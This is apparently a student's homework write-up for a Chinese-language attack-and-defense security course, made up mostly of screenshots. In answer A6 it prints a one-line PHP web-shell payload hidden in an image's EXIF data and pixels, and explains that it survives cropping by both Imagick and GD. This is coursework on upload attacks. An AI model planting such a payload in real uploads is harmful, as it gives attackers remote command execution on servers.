# 攻擊與防禦 HW5A ###### tags: `攻擊與防禦` ## #A1 ![](https://i.imgur.com/dCpcjl4.png =480x) ![](https://i.imgur.com/r1Z466M.png =480x) ![](https://i.imgur.com/lp9qc2c.png =480x) ## #A2 ![](https://i.imgur.com/u7c85lu.png) ## #A3 ![](https://i.imgur.com/KNgttAJ.png) ## #A4 ![](https://i.imgur.com/QG0b28p.png) 因為 PHP CGI 是用 user `nginx` 身分下去跑的,所以答案是 nginx 。另,我使用 nginx 作為 web server 而非 Apache 。 ## #A5 ABCE ## #A6 檢視圖片原圖,發現在 EXIF 和圖片本身的內容中都摻有 payload ``<?=`$_GET[0]`;?>`` 。 ![](https://i.imgur.com/1HfdtEh.png =480x) Imagick 會保留 EXIF ,因此當圖片被裁減後,圖片內容中的 payload 會被移除,但 EXIF 中的 payload 會被保留,如下圖。 ![](https://i.imgur.com/BgJzPK5.png =480x) GD 不會保留 EXIF ,但裁減圖片後卻保留了圖片內容中的 payload 。下圖顯示剪裁後的部分圖片資料。 ![](https://i.imgur.com/pIhsUdV.png =480x) 結論是無論使用 Imagick 還是 GD ,攻擊都會成功,因為洽有一個 payload 被保存下來。